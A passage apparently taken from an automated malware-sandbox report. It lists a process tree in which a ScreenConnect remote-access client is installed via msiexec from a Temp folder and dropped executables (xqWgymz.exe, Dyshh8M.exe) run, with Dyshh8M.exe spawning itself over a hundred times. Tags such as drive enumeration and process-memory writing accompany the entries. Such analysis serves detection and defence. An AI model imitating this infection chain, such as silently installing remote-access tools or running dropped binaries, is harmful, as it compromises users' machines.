        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"
        6⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2392
    - - C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10030770101\xqWgymz.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3340
    - - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3920
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:1232
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4272
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4352
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4540
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4688
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:396
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4432
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3184
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3640
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5064
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:432
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3912
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:1944
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:828
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:1316
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4368
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:2228
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4800
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:2588
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4212
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:1444
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:1456
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5028
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5048
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:856
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3144
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:2424
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4828
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3620
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4064
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:2888
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:1128
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4380
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5036
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:1588
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:2372
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4240
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:2740
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:4340
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3384
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:3608
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:736
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:368
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:1600
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5124
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5132
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5140
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5148
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5156
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        Executes dropped EXE
        
        PID:5164
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5172
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5180
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5188
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5196
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5204
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5212
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5220
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5228
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5236
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5244
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5252
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5260
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5268
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5276
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5284
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5292
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5300
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5308
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5316
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5324
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5332
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5340
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5348
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5356
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5364
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5372
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5380
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5388
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5396
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5404
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5412
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5420
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5428
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5436
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5444
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5452
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5460
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5468
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5476
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5484
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5492
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5500
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5508
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5516
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5524
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5532
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5540
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5548
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5556
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5564
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5572
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5580
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5588
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5596
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5604
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5612
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5620
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5628
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5636
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5644
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5652
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5668
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5676
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5684
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5692
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5700
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5708
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5716
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5724
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5732
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5740
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5748
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5756
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5764
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5772
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5780
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5788
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5800
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5808
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5816
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5824
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5832
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5840
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5848
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5856
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5864
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5872
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5880
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5888
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5896
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5904
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5912
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5920
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5928
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:5936
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
